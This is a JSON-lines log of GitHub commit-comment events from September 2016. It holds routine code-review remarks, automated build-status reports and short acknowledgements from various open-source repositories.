{"id":"4548207979","type":"CommitCommentEvent","actor":{"login":"juggernautsei"},"repo":{"name":"juggernautsei/openemr"},"payload":{"comment":{"id":18981872,"position":null,"line":null,"path":null,"commit_id":"0cbc00e1cb70d7f57f720baf766b1558fda4f351","created_at":"2016-09-12T09:23:30Z","updated_at":"2016-09-12T09:23:30Z","body":"Ok will proceed."}},"created_at":"2016-09-12T09:23:30Z"}
{"id":"4548208100","type":"CommitCommentEvent","actor":{"login":"Justinzobel"},"repo":{"name":"solus-project/3rd-party"},"payload":{"comment":{"id":18981873,"position":null,"line":null,"path":null,"commit_id":"e99f5df879194c11f8a80dd145a20184e1b89af8","created_at":"2016-09-12T09:23:31Z","updated_at":"2016-09-12T09:23:31Z","body":"Did this run OK after the update? I couldn't get it to launch from the Budgie menu after updating yesterday locally."}},"created_at":"2016-09-12T09:23:31Z"}
{"id":"4548209980","type":"CommitCommentEvent","actor":{"login":"LucHermitte"},"repo":{"name":"orfeotoolbox/OTB"},"payload":{"comment":{"id":18981881,"position":16,"line":120,"path":"Modules/ThirdParty/OssimPlugins/src/ossim/ossimSentinel1Model.cpp","commit_id":"5dec0466cabc4bcb2abeb790a4685db2daeaf9ff","created_at":"2016-09-12T09:23:55Z","updated_at":"2016-09-12T09:23:55Z","body":"Why the extra space ? `SCOPED_LOG` already adds a space."}},"created_at":"2016-09-12T09:23:55Z"}
{"id":"4548213573","type":"CommitCommentEvent","actor":{"login":"psycofdj"},"repo":{"name":"psycofdj/xtdcpp"},"payload":{"comment":{"id":18981886,"position":null,"line":null,"path":null,"commit_id":"03ee8544bcfa40379b855509f0e848c507fe1143","created_at":"2016-09-12T09:24:44Z","updated_at":"2016-09-12T09:24:44Z","body":"Automatic build report for commit 03ee8544bcfa40379b855509f0e848c507fe1143:\n\n[![UnitTests](https://img.shields.io/badge/unittests-passed%20%3A%20%282/2%29%20-brightgreen.svg)](#)\n[![UnitTests](https://img.shields.io/badge/coverage-7.16%20%25-yellow.svg)](#)\n"}},"created_at":"2016-09-12T09:24:44Z"}
{"id":"4548214231","type":"CommitCommentEvent","actor":{"login":"Joris-van-der-Wel"},"repo":{"name":"tmpvar/jsdom"},"payload":{"comment":{"id":18981888,"position":10,"line":568,"path":"README.md","commit_id":"a6acac4e9dec4f859fff22676fb4e9eaa9139787","created_at":"2016-09-12T09:24:52Z","updated_at":"2016-09-12T09:24:52Z","body":"typo: scartch"}},"created_at":"2016-09-12T09:24:52Z"}
{"id":"4548214611","type":"CommitCommentEvent","actor":{"login":"psycofdj"},"repo":{"name":"psycofdj/xtdcpp"},"payload":{"comment":{"id":18981890,"position":null,"line":null,"path":null,"commit_id":"03ee8544bcfa40379b855509f0e848c507fe1143","created_at":"2016-09-12T09:24:57Z","updated_at":"2016-09-12T09:24:57Z","body":"Automatic build report for commit 03ee8544bcfa40379b855509f0e848c507fe1143:\n\n[![UnitTests](https://img.shields.io/badge/unittests-passed%20%282/2%29%20-brightgreen.svg)](#)\n[![UnitTests](https://img.shields.io/badge/coverage-7.16%20%25-yellow.svg)](#)\n"}},"created_at":"2016-09-12T09:24:57Z"}
{"id":"4548215044","type":"CommitCommentEvent","actor":{"login":"garfield69"},"repo":{"name":"SchizoDuckie/DuckieTV"},"payload":{"comment":{"id":18981893,"position":null,"line":null,"path":null,"commit_id":"814efd1dcb144abf6df395e643eaae366e22efe4","created_at":"2016-09-12T09:25:03Z","updated_at":"2016-09-12T09:25:03Z","body":"Yup.\nhttps://github.com/SchizoDuckie/DuckieTV/commit/6613bb0bfe35248e74b34a6771cf\nee27f1c17ead\n\n \n\n  _____  \n\nFrom: Js41637 ftw [mailto:notifications@github.com] \nSent: Monday, 12 September 2016 21:22\nTo: SchizoDuckie/DuckieTV\nCc: garfield69; Author\nSubject: Re: [SchizoDuckie/DuckieTV] update translate-once to 1.0.4\n(814efd1)\n\n \n\nI did?\n\n-\nYou are receiving this because you authored the thread.\nReply to this email directly, view\n<https://github.com/SchizoDuckie/DuckieTV/commit/814efd1dcb144abf6df395e643e\naae366e22efe4#commitcomment-18981852>  it on GitHub, or mute\n<https://github.com/notifications/unsubscribe-auth/AGnK-PJ-T2wgGQ3yBz1KCcIfM\n6JakSHyks5qpRm9gaJpZM4J6YN->  the thread.\n<https://github.com/notifications/beacon/AGnK-CnC6ZSy0u96XAs3-qnSuEydTxigks5\nqpRm9gaJpZM4J6YN-.gif> \n\n\n \n\n"}},"created_at":"2016-09-12T09:25:03Z"}
{"id":"4548217801","type":"CommitCommentEvent","actor":{"login":"LucHermitte"},"repo":{"name":"orfeotoolbox/OTB"},"payload":{"comment":{"id":18981903,"position":7,"line":39,"path":"Modules/ThirdParty/OssimPlugins/src/ossim/ossimSentinel1Model.h","commit_id":"5dec0466cabc4bcb2abeb790a4685db2daeaf9ff","created_at":"2016-09-12T09:25:38Z","updated_at":"2016-09-12T09:25:38Z","body":"It should be moved out into its own header+.cpp files. It's not S1 specific."}},"created_at":"2016-09-12T09:25:38Z"}
{"id":"4548218746","type":"CommitCommentEvent","actor":{"login":"tplavcic"},"repo":{"name":"Percona-QA/proxysql-admin-tool"},"payload":{"comment":{"id":18981906,"position":129,"line":129,"path":"proxysql-admin-tool.sh","commit_id":"3052215c382dff4330ab263cd35e4eb07f424bcf","created_at":"2016-09-12T09:25:50Z","updated_at":"2016-09-12T09:25:50Z","body":"I was constantly getting that proxysql is already running but there was no proxysql process. Since the script name itself includes \"proxysql\" the line"}},"created_at":"2016-09-12T09:25:50Z"}
{"id":"4548221195","type":"CommitCommentEvent","actor":{"login":"fb71"},"repo":{"name":"Polymap4/polymap4-p4"},"payload":{"comment":{"id":18981909,"position":null,"line":null,"path":null,"commit_id":"9a6b1cd74928a9b56f402c19329b88ffdfba005b","created_at":"2016-09-12T09:26:23Z","updated_at":"2016-09-12T09:26:23Z","body":"Super! Danke. :)"}},"created_at":"2016-09-12T09:26:23Z"}
{"id":"4548221876","type":"CommitCommentEvent","actor":{"login":"LucHermitte"},"repo":{"name":"orfeotoolbox/OTB"},"payload":{"comment":{"id":18981913,"position":12,"line":44,"path":"Modules/ThirdParty/OssimPlugins/src/ossim/ossimSentinel1Model.h","commit_id":"5dec0466cabc4bcb2abeb790a4685db2daeaf9ff","created_at":"2016-09-12T09:26:32Z","updated_at":"2016-09-12T09:26:32Z","body":"The end user will prefer: `\"Cannot list file in directory \"+ path+\": \"+GetLastError()`"}},"created_at":"2016-09-12T09:26:32Z"}
{"id":"4548223303","type":"CommitCommentEvent","actor":{"login":"Naser1313"},"repo":{"name":"optimizely/nuclear-js"},"payload":{"comment":{"id":18981916,"position":null,"line":null,"path":null,"commit_id":"dc4bffd51fdd0e48ef3ebdc3b21f3ffbf7a1bc44","created_at":"2016-09-12T09:26:50Z","updated_at":"2016-09-12T09:26:50Z","body":"Build"}},"created_at":"2016-09-12T09:26:50Z"}
{"id":"4548224491","type":"CommitCommentEvent","actor":{"login":"Naser1313"},"repo":{"name":"optimizely/nuclear-js"},"payload":{"comment":{"id":18981919,"position":null,"line":null,"path":null,"commit_id":"dc4bffd51fdd0e48ef3ebdc3b21f3ffbf7a1bc44","created_at":"2016-09-12T09:27:07Z","updated_at":"2016-09-12T09:27:07Z","body":"Plugin"}},"created_at":"2016-09-12T09:27:07Z"}
{"id":"4548226824","type":"CommitCommentEvent","actor":{"login":"Naser1313"},"repo":{"name":"optimizely/nuclear-js"},"payload":{"comment":{"id":18981923,"position":null,"line":null,"path":null,"commit_id":"dc4bffd51fdd0e48ef3ebdc3b21f3ffbf7a1bc44","created_at":"2016-09-12T09:27:39Z","updated_at":"2016-09-12T09:27:39Z","body":"Download with plugin"}},"created_at":"2016-09-12T09:27:39Z"}
{"id":"4548227848","type":"CommitCommentEvent","actor":{"login":"mbootsector"},"repo":{"name":"mbootsector/Stockfish"},"payload":{"comment":{"id":18981924,"position":null,"line":null,"path":null,"commit_id":"afbe6ac597dfb2bb7ce9203e62b7ed637bd7a935","created_at":"2016-09-12T09:27:52Z","updated_at":"2016-09-12T09:27:52Z","body":"Probably the usual case of not enough games. I use lower confidence bounds for SPRT for my local tests than the one used online.\r\n"}},"created_at":"2016-09-12T09:27:52Z"}
{"id":"4548230043","type":"CommitCommentEvent","actor":{"login":"White-Oak"},"repo":{"name":"siphilia/qml-rust"},"payload":{"comment":{"id":18981925,"position":null,"line":null,"path":null,"commit_id":"217207732269f9ec81469cc9b45442739efee7dd","created_at":"2016-09-12T09:28:20Z","updated_at":"2016-09-12T09:28:20Z","body":"Hi @siphilia, I hope it's ok with you if I would pull the following commits to the origin repo (https://github.com/White-Oak/qml-rust): 217207732269f9ec81469cc9b45442739efee7dd, 5f1dbc60ebd21ac8d2670d4bfd679fb807756f64, 11c814ec3d8a27bd2b26f9fdfe2df6ba24dc7af2?"}},"created_at":"2016-09-12T09:28:20Z"}
{"id":"4548232099","type":"CommitCommentEvent","actor":{"login":"mbootsector"},"repo":{"name":"mbootsector/Stockfish"},"payload":{"comment":{"id":18981932,"position":null,"line":null,"path":null,"commit_id":"afbe6ac597dfb2bb7ce9203e62b7ed637bd7a935","created_at":"2016-09-12T09:28:46Z","updated_at":"2016-09-12T09:28:46Z","body":"Since this patch was yellow, I'll try LTC."}},"created_at":"2016-09-12T09:28:46Z"}
{"id":"4548235040","type":"CommitCommentEvent","actor":{"login":"calmh"},"repo":{"name":"syncthing/syncthing"},"payload":{"comment":{"id":18981936,"position":null,"line":null,"path":null,"commit_id":"d8b5070ca8203b09c037fe40f2b5670cbe7101f3","created_at":"2016-09-12T09:29:25Z","updated_at":"2016-09-12T09:29:25Z","body":"Gnnh"}},"created_at":"2016-09-12T09:29:25Z"}
{"id":"4548236702","type":"CommitCommentEvent","actor":{"login":"Enygma2002"},"repo":{"name":"xwiki/xwiki-platform"},"payload":{"comment":{"id":18981943,"position":14,"line":58,"path":"xwiki-platform-core/xwiki-platform-store/xwiki-platform-store-serialization/src/main/java/org/xwiki/store/serialization/xml/XMLSerializer.java","commit_id":"f6ae50f9adf9057d652050c22a1c75f56ecf61e1","created_at":"2016-09-12T09:29:47Z","updated_at":"2016-09-12T09:29:47Z","body":"You`ve missed one :)"}},"created_at":"2016-09-12T09:29:47Z"}
{"id":"4548238441","type":"CommitCommentEvent","actor":{"login":"gvancuts"},"repo":{"name":"kiendinh/SmartHome-Demo"},"payload":{"comment":{"id":18981946,"position":66,"line":66,"path":"sensors/DC_power_meter/src/main.c","commit_id":"9e8bb11ce9cb57d54c9d609d8e3b92c5221e6368","created_at":"2016-09-12T09:30:13Z","updated_at":"2016-09-12T09:30:13Z","body":"s/neededm/needed"}},"created_at":"2016-09-12T09:30:13Z"}
{"id":"4548239209","type":"CommitCommentEvent","actor":{"login":"alepuccetti"},"repo":{"name":"kinvolk/mountinfo-graph"},"payload":{"comment":{"id":18981947,"position":13,"line":31,"path":"read-file.go","commit_id":"7c2186a7a4101ce974acc7947a8d84f9424b30c8","created_at":"2016-09-12T09:30:22Z","updated_at":"2016-09-12T09:30:22Z","body":"If you want to give a little bit more context, `mountinfoReader` sounds good."}},"created_at":"2016-09-12T09:30:22Z"}
{"id":"4548240348","type":"CommitCommentEvent","actor":{"login":"gvancuts"},"repo":{"name":"kiendinh/SmartHome-Demo"},"payload":{"comment":{"id":18981957,"position":90,"line":90,"path":"sensors/DC_power_meter/src/main.c","commit_id":"9e8bb11ce9cb57d54c9d609d8e3b92c5221e6368","created_at":"2016-09-12T09:30:35Z","updated_at":"2016-09-12T09:30:35Z","body":"s/neededm/needed"}},"created_at":"2016-09-12T09:30:35Z"}
{"id":"4548247656","type":"CommitCommentEvent","actor":{"login":"rameshvs02"},"repo":{"name":"Percona-QA/proxysql-admin-tool"},"payload":{"comment":{"id":18981972,"position":129,"line":129,"path":"proxysql-admin-tool.sh","commit_id":"3052215c382dff4330ab263cd35e4eb07f424bcf","created_at":"2016-09-12T09:32:09Z","updated_at":"2016-09-12T09:32:09Z","body":"Thanks for the update. Will modify the code."}},"created_at":"2016-09-12T09:32:09Z"}
{"id":"4548247660","type":"CommitCommentEvent","actor":{"login":"rameshvs02"},"repo":{"name":"Percona-QA/proxysql-admin-tool"},"payload":{"comment":{"id":18981973,"position":7,"line":7,"path":"proxysql-admin-tool.sh","commit_id":"3052215c382dff4330ab263cd35e4eb07f424bcf","created_at":"2016-09-12T09:32:09Z","updated_at":"2016-09-12T09:32:09Z","body":"Okay will make it as default option."}},"created_at":"2016-09-12T09:32:09Z"}
{"id":"4548248033","type":"CommitCommentEvent","actor":{"login":"oscargus"},"repo":{"name":"JabRef/jabref"},"payload":{"comment":{"id":18981974,"position":null,"line":null,"path":null,"commit_id":"7d9c3dc1f01ef39ba25ea2b253ece1542f3f64f6","created_at":"2016-09-12T09:32:13Z","updated_at":"2016-09-12T09:32:13Z","body":"Not sure how this works, but there is an entry with grimes2 that probably should be removed?"}},"created_at":"2016-09-12T09:32:13Z"}
{"id":"4548248080","type":"CommitCommentEvent","actor":{"login":"psycofdj"},"repo":{"name":"psycofdj/xtdcpp"},"payload":{"comment":{"id":18981975,"position":null,"line":null,"path":null,"commit_id":"03ee8544bcfa40379b855509f0e848c507fe1143","created_at":"2016-09-12T09:32:14Z","updated_at":"2016-09-12T09:32:14Z","body":"Automatic build report for commit 03ee8544bcfa40379b855509f0e848c507fe1143:\n\n[![UnitTests](https://img.shields.io/badge/unittests-passed%20%282/2%29%20-brightgreen.svg)](#)\n[![Coverage](https://img.shields.io/badge/coverage-7.16%20%25-yellow.svg)](#)\n[![Cppcheck](https://img.shields.io/badge/cppcheck-2%20error%28s%29-yellow.svg)](#)\n"}},"created_at":"2016-09-12T09:32:14Z"}
{"id":"4548250935","type":"CommitCommentEvent","actor":{"login":"2016JTM2087"},"repo":{"name":"2016JTM2087/ytfyugfy"},"payload":{"comment":{"id":18981979,"position":null,"line":null,"path":null,"commit_id":"d0364cc1d3a1d80e483be462802fd5c9c8f9bbad","created_at":"2016-09-12T09:32:49Z","updated_at":"2016-09-12T09:32:49Z","body":"nothing"}},"created_at":"2016-09-12T09:32:49Z"}
{"id":"4548251018","type":"CommitCommentEvent","actor":{"login":"Luckymalina"},"repo":{"name":"TouchMate/Technomart"},"payload":{"comment":{"id":18981980,"position":13,"line":13,"path":"catalog.html","commit_id":"78ccc258634a890744da9665bf3c3ffda9292468","created_at":"2016-09-12T09:32:50Z","updated_at":"2016-09-12T09:32:50Z","body":"Здесь должна быть форма с input, так как это поле поиска и оно должно функционировать, теоретически.. "}},"created_at":"2016-09-12T09:32:50Z"}
{"id":"4548251405","type":"CommitCommentEvent","actor":{"login":"snicolet"},"repo":{"name":"official-stockfish/Stockfish"},"payload":{"comment":{"id":18981981,"position":57,"line":1007,"path":"src/position.cpp","commit_id":"90ce24b11ea080f923e1b5d37470e2ca98f4d98b","created_at":"2016-09-12T09:32:56Z","updated_at":"2016-09-12T09:32:56Z","body":"We can use `(occupied ^ to)` instead of `(occupied ^ (occupied & to))`"}},"created_at":"2016-09-12T09:32:56Z"}
{"id":"4548251933","type":"CommitCommentEvent","actor":{"login":"Enygma2002"},"repo":{"name":"xwiki/xwiki-platform"},"payload":{"comment":{"id":18981983,"position":14,"line":58,"path":"xwiki-platform-core/xwiki-platform-store/xwiki-platform-store-serialization/src/main/java/org/xwiki/store/serialization/xml/XMLSerializer.java","commit_id":"f6ae50f9adf9057d652050c22a1c75f56ecf61e1","created_at":"2016-09-12T09:33:03Z","updated_at":"2016-09-12T09:33:03Z","body":"Fixed in 2fbe2ed7e4cf4208e964266ceb1d3c2905761e47"}},"created_at":"2016-09-12T09:33:03Z"}
{"id":"4548252323","type":"CommitCommentEvent","actor":{"login":"ignatenkobrain"},"repo":{"name":"rpm-software-management/dnf"},"payload":{"comment":{"id":18981985,"position":5,"line":523,"path":"dnf/conf/config.py","commit_id":"07c6d48fa51bf8c845a7c9f9589ce5ff96152665","created_at":"2016-09-12T09:33:09Z","updated_at":"2016-09-12T09:33:09Z","body":"`value = None`"}},"created_at":"2016-09-12T09:33:09Z"}
{"id":"4548257377","type":"CommitCommentEvent","actor":{"login":"Luckymalina"},"repo":{"name":"TouchMate/Technomart"},"payload":{"comment":{"id":18981994,"position":6,"line":6,"path":"catalog.html","commit_id":"78ccc258634a890744da9665bf3c3ffda9292468","created_at":"2016-09-12T09:34:15Z","updated_at":"2016-09-12T09:34:15Z","body":"Уже не Седона )"}},"created_at":"2016-09-12T09:34:15Z"}
{"id":"4548258194","type":"CommitCommentEvent","actor":{"login":"pawelfus"},"repo":{"name":"highcharts/highcharts"},"payload":{"comment":{"id":18981996,"position":null,"line":null,"path":null,"commit_id":"59416040f35b083fe346a5c9d2c924652bbfb4a0","created_at":"2016-09-12T09:34:24Z","updated_at":"2016-09-12T09:34:24Z","body":"Okay!"}},"created_at":"2016-09-12T09:34:24Z"}
{"id":"4548259027","type":"CommitCommentEvent","actor":{"login":"2016JTM2087"},"repo":{"name":"2016JTM2087/ANUPAM"},"payload":{"comment":{"id":18981998,"position":null,"line":null,"path":null,"commit_id":"03eecd4fc825265f423d2d67efdf183774716cd1","created_at":"2016-09-12T09:34:35Z","updated_at":"2016-09-12T09:34:35Z","body":"we have to count the frequency of the words\r\n"}},"created_at":"2016-09-12T09:34:35Z"}
{"id":"4548259591","type":"CommitCommentEvent","actor":{"login":"tmortagne"},"repo":{"name":"xwiki/xwiki-platform"},"payload":{"comment":{"id":18982000,"position":14,"line":58,"path":"xwiki-platform-core/xwiki-platform-store/xwiki-platform-store-serialization/src/main/java/org/xwiki/store/serialization/xml/XMLSerializer.java","commit_id":"f6ae50f9adf9057d652050c22a1c75f56ecf61e1","created_at":"2016-09-12T09:34:42Z","updated_at":"2016-09-12T09:34:42Z","body":"Thanks."}},"created_at":"2016-09-12T09:34:42Z"}
{"id":"4548259648","type":"CommitCommentEvent","actor":{"login":"LiXinnnnnn"},"repo":{"name":"LiXinnnnnn/LiXinnnnnn.github.io"},"payload":{"comment":{"id":18982001,"position":null,"line":null,"path":null,"commit_id":"752b0020567600d5be6521c925915a623513bb36","created_at":"2016-09-12T09:34:43Z","updated_at":"2016-09-12T09:34:43Z","body":"同意"}},"created_at":"2016-09-12T09:34:43Z"}
{"id":"4548260175","type":"CommitCommentEvent","actor":{"login":"rkanavath"},"repo":{"name":"orfeotoolbox/OTB"},"payload":{"comment":{"id":18982003,"position":16,"line":120,"path":"Modules/ThirdParty/OssimPlugins/src/ossim/ossimSentinel1Model.cpp","commit_id":"5dec0466cabc4bcb2abeb790a4685db2daeaf9ff","created_at":"2016-09-12T09:34:51Z","updated_at":"2016-09-12T09:34:51Z","body":"when i try to read a fake s1 data, I got an error message without spaces on windows"}},"created_at":"2016-09-12T09:34:51Z"}
{"id":"4548265358","type":"CommitCommentEvent","actor":{"login":"AlexandreMasta"},"repo":{"name":"mbootsector/Stockfish"},"payload":{"comment":{"id":18982016,"position":null,"line":null,"path":null,"commit_id":"afbe6ac597dfb2bb7ce9203e62b7ed637bd7a935","created_at":"2016-09-12T09:35:56Z","updated_at":"2016-09-12T09:35:56Z","body":"Makes sense. My machine is one of the fastest machines when comparing Nodes/sec in the Framework. 2.7MNps \tor 2.6MNps \tspeed. So makes sense giving more time to others."}},"created_at":"2016-09-12T09:35:56Z"}
{"id":"4548265987","type":"CommitCommentEvent","actor":{"login":"SebastianM"},"repo":{"name":"SebastianM/angular2-google-maps"},"payload":{"comment":{"id":18982017,"position":null,"line":null,"path":null,"commit_id":"19951f30c54645643f9bed3501a61bea9f5c9606","created_at":"2016-09-12T09:36:05Z","updated_at":"2016-09-12T09:36:05Z","body":"@brian-singer :+1: "}},"created_at":"2016-09-12T09:36:05Z"}
{"id":"4548267806","type":"CommitCommentEvent","actor":{"login":"vitalidze"},"repo":{"name":"vitalidze/traccar-web"},"payload":{"comment":{"id":18982023,"position":null,"line":null,"path":null,"commit_id":"7a5196abd5c29fa3f4ad761a58c2c4e7d625507f","created_at":"2016-09-12T09:36:28Z","updated_at":"2016-09-12T09:36:28Z","body":"@TecSeguridad looks like you have updated `MapView.java` file incorrectly. You should be able to check it out from this github repository."}},"created_at":"2016-09-12T09:36:28Z"}
{"id":"4548267874","type":"CommitCommentEvent","actor":{"login":"saliceti"},"repo":{"name":"alphagov/paas-cf"},"payload":{"comment":{"id":18982024,"position":6,"line":10,"path":"manifests/bosh-manifest/deployments/050-datadog.yml","commit_id":"beb80bc7bb1e79c5c5edf53c660722172c13698a","created_at":"2016-09-12T09:36:29Z","updated_at":"2016-09-12T09:36:29Z","body":"This is good.\r\nI think you can merge this commit with https://github.com/alphagov/paas-cf/commit/7e59561b3ced255a2793c3ead2638c802c6ce813"}},"created_at":"2016-09-12T09:36:29Z"}
{"id":"4548268210","type":"CommitCommentEvent","actor":{"login":"grimes2"},"repo":{"name":"JabRef/jabref"},"payload":{"comment":{"id":18982025,"position":null,"line":null,"path":null,"commit_id":"7d9c3dc1f01ef39ba25ea2b253ece1542f3f64f6","created_at":"2016-09-12T09:36:33Z","updated_at":"2016-09-12T09:36:33Z","body":"Yes, please remove grimes2. AFAIK also Siedlerchr can be removed?"}},"created_at":"2016-09-12T09:36:33Z"}
{"id":"4548270622","type":"CommitCommentEvent","actor":{"login":"rkanavath"},"repo":{"name":"orfeotoolbox/OTB"},"payload":{"comment":{"id":18982030,"position":7,"line":39,"path":"Modules/ThirdParty/OssimPlugins/src/ossim/ossimSentinel1Model.h","commit_id":"5dec0466cabc4bcb2abeb790a4685db2daeaf9ff","created_at":"2016-09-12T09:37:06Z","updated_at":"2016-09-12T09:37:06Z","body":"could we keep this now and push the patch to ossimDirectory ?"}},"created_at":"2016-09-12T09:37:06Z"}
{"id":"4548270676","type":"CommitCommentEvent","actor":{"login":"AlexandreMasta"},"repo":{"name":"mbootsector/Stockfish"},"payload":{"comment":{"id":18982031,"position":null,"line":null,"path":null,"commit_id":"afbe6ac597dfb2bb7ce9203e62b7ed637bd7a935","created_at":"2016-09-12T09:37:07Z","updated_at":"2016-09-12T09:37:07Z","body":"I´ll let my machine ON today"}},"created_at":"2016-09-12T09:37:07Z"}
{"id":"4548271867","type":"CommitCommentEvent","actor":{"login":"koying"},"repo":{"name":"koying/SPMC"},"payload":{"comment":{"id":18982033,"position":null,"line":null,"path":null,"commit_id":"115edb86cd517d24e1ef0beb2551fd94860d7578","created_at":"2016-09-12T09:37:21Z","updated_at":"2016-09-12T09:37:21Z","body":"Thanks, but they are only playing noise, which doesnt say much ;)\r\nhttps://android.googlesource.com/platform/cts/+/6b17bbf/tests/tests/media/src/android/media/cts/AudioTrackSurroundTest.java#413\r\n\r\nActually, I think they screwed up (again) and just ignored HD audio:\r\nhttp://androidxref.com/7.0.0_r1/xref/frameworks/base/media/java/android/media/AudioTrack.java#818"}},"created_at":"2016-09-12T09:37:21Z"}
{"id":"4548272836","type":"CommitCommentEvent","actor":{"login":"brendonhumphrey"},"repo":{"name":"openzfsonosx/spl"},"payload":{"comment":{"id":18982038,"position":null,"line":null,"path":null,"commit_id":"6c22600ab70187ddf6d070d6bc9fc18084e031c0","created_at":"2016-09-12T09:37:32Z","updated_at":"2016-09-12T09:37:32Z","body":"Tried it, no glitches.\n\n> On 12 Sep 2016, at 4:34 AM, rottegift <notifications@github.com> wrote:\n> \n> Current experiment is to create a root below the heap (in your plain vmem_experiments that would be the heap_parent one), and vmem_add(thatvmp, ptr, size) 1 GiB spans to it, then run as a fixed size.\n> \n> It's running. There won't be calls to xnu's freer until spl finishes.\n> \n> The downside is that this really does permanently wire down memory, and without major rewriting, you can only grow by doing vmem_add in future; it's not dynamic in the vmem layer, and you can't shrink below whatever you've vmem_added.\n> \n> On the other hand, if you try something like this and get no glitches (you shouldn't) even during maximal writes, this might be an acceptable trade-off.\n> \n> rottegift@f6395b9 <https://github.com/rottegift/spl/commit/f6395b968c674b0bf93f679dc69deebfeafa76af>\n> rottegift@9315315 <https://github.com/rottegift/spl/commit/93153157523197cb03871df5b593d331342fc892>\n> —\n> You are receiving this because you were mentioned.\n> Reply to this email directly, view it on GitHub <https://github.com/openzfsonosx/spl/commit/6c22600ab70187ddf6d070d6bc9fc18084e031c0#commitcomment-18977705>, or mute the thread <https://github.com/notifications/unsubscribe-auth/AFWzn7mbPBGHWcWPG1P87JczTdx6lHgYks5qpEnSgaJpZM4J5uzK>.\n> \n\n"}},"created_at":"2016-09-12T09:37:32Z"}
{"id":"4548274553","type":"CommitCommentEvent","actor":{"login":"dreispt"},"repo":{"name":"odoo-dev/odoo"},"payload":{"comment":{"id":18982040,"position":null,"line":null,"path":null,"commit_id":"4105756dee796a2bd9c21a57f2e2c26d2bcb99bd","created_at":"2016-09-12T09:37:54Z","updated_at":"2016-09-12T09:37:54Z","body":"You should mention that the `t-elif` and `t-else` directives are only supported on the js client-side implementation, and not in the Python server-side one.\r\n\r\nDon't you need a `t-endif`? Is the end automatic on the next `t-if` block?\r\nThe tests should include a second t-if t-else group to confirm this.\r\nAre else block limited to siblings under the same HTML element?"}},"created_at":"2016-09-12T09:37:54Z"}
{"id":"4548279806","type":"CommitCommentEvent","actor":{"login":"XbimCI"},"repo":{"name":"xBimTeam/XbimGeometry"},"payload":{"comment":{"id":18982049,"position":null,"line":null,"path":null,"commit_id":"fafb87f1fdd33b853612d40fc472b0e48c9ac5e6","created_at":"2016-09-12T09:39:00Z","updated_at":"2016-09-12T09:39:00Z","body":"TeamCity Xbim :: Xbim Geometry :: XbimGeometry [Build 237](http://xbimbuilds.cloudapp.net/viewLog.html?buildId=1193&buildTypeId=Xbim_XbimGeometry_XbimGeometry) outcome was **FAILURE**\nSummary: Exit code 1 Build time: 00:25:56"}},"created_at":"2016-09-12T09:39:00Z"}
{"id":"4548279816","type":"CommitCommentEvent","actor":{"login":"XbimCI"},"repo":{"name":"xBimTeam/XbimGeometry"},"payload":{"comment":{"id":18982050,"position":null,"line":null,"path":null,"commit_id":"7078b67b3d35a0a404ee9ee1c72a3fe511daba32","created_at":"2016-09-12T09:39:01Z","updated_at":"2016-09-12T09:39:01Z","body":"TeamCity Xbim :: Xbim Geometry :: XbimGeometry [Build 238](http://xbimbuilds.cloudapp.net/viewLog.html?buildId=1194&buildTypeId=Xbim_XbimGeometry_XbimGeometry) is now running\n"}},"created_at":"2016-09-12T09:39:01Z"}
{"id":"4548283091","type":"CommitCommentEvent","actor":{"login":"DMIAOCHEN"},"repo":{"name":"DMIAOCHEN/eWorldWebApplication"},"payload":{"comment":{"id":18982055,"position":null,"line":null,"path":null,"commit_id":"9f102f82cc16a5d4ff16ec16ddf4e782415c0592","created_at":"2016-09-12T09:39:45Z","updated_at":"2016-09-12T09:39:45Z","body":"#1 "}},"created_at":"2016-09-12T09:39:45Z"}
{"id":"4548288738","type":"CommitCommentEvent","actor":{"login":"DMIAOCHEN"},"repo":{"name":"DMIAOCHEN/eWorldWebApplication"},"payload":{"comment":{"id":18982066,"position":null,"line":null,"path":null,"commit_id":"fd90072964ca7604d21f1308f2d6a77a67bf2cff","created_at":"2016-09-12T09:40:59Z","updated_at":"2016-09-12T09:40:59Z","body":"#2 "}},"created_at":"2016-09-12T09:40:59Z"}
{"id":"4548295576","type":"CommitCommentEvent","actor":{"login":"nadavslotky"},"repo":{"name":"tomirendo/measapp"},"payload":{"comment":{"id":18982084,"position":5,"line":37,"path":"Measurement/Sweep.m","commit_id":"c0400127e060a5ca807e9f4b07492b8e894d5f03","created_at":"2016-09-12T09:42:31Z","updated_at":"2016-09-12T09:42:31Z","body":"Just making sure: you didn't make it \"DoubleTimeStep\" intentionally, right?"}},"created_at":"2016-09-12T09:42:31Z"}
{"id":"4548300147","type":"CommitCommentEvent","actor":{"login":"timrobertson100"},"repo":{"name":"gbif/gbif-api"},"payload":{"comment":{"id":18982093,"position":71,"line":313,"path":"src/main/java/org/gbif/api/model/checklistbank/ParsedName.java","commit_id":"57070d0ba4999712ddb2d4d392afe6d271c80476","created_at":"2016-09-12T09:43:31Z","updated_at":"2016-09-12T09:43:31Z","body":"Not sure I follow everything, but perhaps this could lead to inconsistency over time, and should use the same code as the Rank SerDe?"}},"created_at":"2016-09-12T09:43:31Z"}
{"id":"4548302434","type":"CommitCommentEvent","actor":{"login":"chen90kai"},"repo":{"name":"bbelos/rk3188-kernel"},"payload":{"comment":{"id":18982099,"position":121,"line":121,"path":"drivers/power/cw2015.c","commit_id":"b3d4884c90b0df86f66fa168deb4874246cb7b59","created_at":"2016-09-12T09:44:01Z","updated_at":"2016-09-12T09:44:01Z","body":"Hi，您好，我想请教您cw2015_bat_config_info[ SIZE_BATINFO ]这个数组的参数您是如何确定的，是由电池厂家提供，还是自己去测试这组数据？"}},"created_at":"2016-09-12T09:44:01Z"}
{"id":"4548303974","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla-releng/OpenCloudConfig"},"payload":{"comment":{"id":18982103,"position":null,"line":null,"path":null,"commit_id":"87c057db33313c3dac7d1359a08f07d09b0a5d29","created_at":"2016-09-12T09:44:20Z","updated_at":"2016-09-12T09:44:20Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#ED38EGA-SXu-Y3MVMIs7Ng"}},"created_at":"2016-09-12T09:44:20Z"}
{"id":"4548305214","type":"CommitCommentEvent","actor":{"login":"b005t3r"},"repo":{"name":"Gamua/Starling-Framework"},"payload":{"comment":{"id":18982111,"position":null,"line":null,"path":null,"commit_id":"7e20a4930db0383ac555b99cdf45c997afb07bdb","created_at":"2016-09-12T09:44:37Z","updated_at":"2016-09-12T09:44:37Z","body":"It happened around AIR 17, maybe 19 I think. But it did happen :) I investigated it and only reason seemed to be consts."}},"created_at":"2016-09-12T09:44:37Z"}
